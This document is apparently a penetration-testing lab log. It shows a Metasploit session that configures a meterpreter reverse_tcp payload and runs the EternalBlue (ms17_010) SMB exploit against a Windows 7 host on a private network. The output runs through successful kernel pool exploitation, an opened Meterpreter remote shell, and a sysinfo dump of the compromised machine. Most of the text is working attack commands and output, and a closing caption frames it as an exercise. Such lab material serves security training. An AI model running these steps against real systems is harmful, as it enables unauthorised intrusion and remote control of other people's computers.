VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] 192.168.20.202:445 - Connecting to target for exploitation.
[+] 192.168.20.202:445 - Connection established for exploitation.
[+] 192.168.20.202:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.20.202:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.20.202:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.20.202:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.20.202:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.20.202:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.20.202:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.20.202:445 - Sending all but last fragment of exploit packet
[*] 192.168.20.202:445 - Starting non-paged pool grooming
[+] 192.168.20.202:445 - Sending SMBv2 buffers
[+] 192.168.20.202:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.20.202:445 - Sending final SMBv2 buffers.
[*] 192.168.20.202:445 - Sending last fragment of exploit packet!
[*] 192.168.20.202:445 - Receiving response from exploit packet
[+] 192.168.20.202:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.20.202:445 - Sending egg to corrupted connection.
[*] 192.168.20.202:445 - Triggering free of corrupted buffer.
[*] Sending stage (205891 bytes) to 192.168.20.202
[*] Meterpreter session 2 opened (192.168.20.50:4444 -> 192.168.20.202:49164) at 2022-05-22 16:41:24 +0900
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.202:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > sysinfo
Computer : MSDN-SPECIAL
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 2 closed. Reason: User exit
msf exploit(windows/smb/ms17_010_eternalblue) > exit
root@kali:~#
Ex) Run the 'ms17_010_eternalblue' SMB attack against the target (Windows 2008).